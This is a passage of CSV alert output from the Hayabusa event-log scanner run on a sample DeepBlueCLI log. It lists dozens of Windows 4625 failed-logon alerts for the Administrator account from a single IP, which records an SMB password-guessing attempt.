NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjcQaeuo4f8wFXhv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zCzr77BhliB4KKeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z558005RepKaO1zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HFzW25mJz4JLkv7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y7J8m97GQWt2cbSs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJrVwcpABBaZ8cyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VcDw3I4BaFLdIeCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: egEpV9aAuCFjwx2I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th0ZLWF4YeOaNnkK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ahrOLfdy6DCQ9SfO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xiooSdP5eib8PUE3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6nQ2jp9IGYnGeyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejMtyR5QNdJFhw1W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e50kO0aVhfw5np5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 176XyLw6IhEI6NuD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXCzCSSFvpbWNJFd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhHRuZYlH8hekaKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGIUBFRMQ3OBbOA0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7CTT5g1w58eRRlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmVccmad66uOK9ox : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t1jlT6kEcs14dcNZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBty5jOGkkZSZEyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Ci7YUsO5MtFkDSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 12JToliq9mmAuMTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lw9AgAvBGWoXBlim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ReGDyvRpGknAKqqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6mdUn8na4asRfpJP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7Wm5p4HnNCbkyh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MQZwerVd6E08X8Ou : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbDjtLKoX5Q77bn5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O7BNKHiPjzJKCaDk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHqBI8bzZn5VO9gq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xz2ZO3b3QSh6Rdqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEfdhrwbTfCpCXKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kc0LuQzAmQTIF1X3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WMZ70YmzpVp2h8mY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FFVr3Amq6mA3umiu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnN15vqZcww8pqTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSuMRF1txQ9g2Mwi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tUuapChhs4CGO1cS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIMr0hjIkwD8AaEG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ww9HMQX0cqmolYQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJRRZ5e9lARVZDar : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvUzVoSLqFPAXSWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SMMgPu1VJIjAWPDW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1JjIa4nOKDTLuAD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0J0GJIm1UUXHH9QJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YmVX3xIz0hrQFvPr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nv4tKFEmHjiXkVDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esdHHJl9LBek9pIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MWofwwLjwiyBk39P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dvsHFZe7Z1uJ9Dkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8aDdgwvb1zsZF79k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQUb6CnMUtyrMNhF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP5OxHPsbLHnIUBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ysg903vYFhQHYvFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IySarHtsTvwSP56H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GnUy8tbCIAVnmhDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bfBtc4MnMtPG6MpC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37b8MGIHY8QwXf9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDuaWikplDmJNmIE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kSSoAYJILHCPI7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9ikrtTGcZYU1556 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ypyd6SagvUXQHhtZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWS37lIJ3Q6ghgMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H211KmFImpBRwTGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64tO5iBehXQcNc49 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xvxDngRj3j5TAwST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8VYRjMnxDgUTWYf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhWphTesbUf0hwi1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MO8VRRVANxIkDzEX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ziSXANiDAf7LRFz5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g0CvYYtyEcU2riBX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPg2LKgWMeM0Oqo0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbzL9T2d4RdeCz4q : IP Address: 192.168.198.149 : AuthPackage: 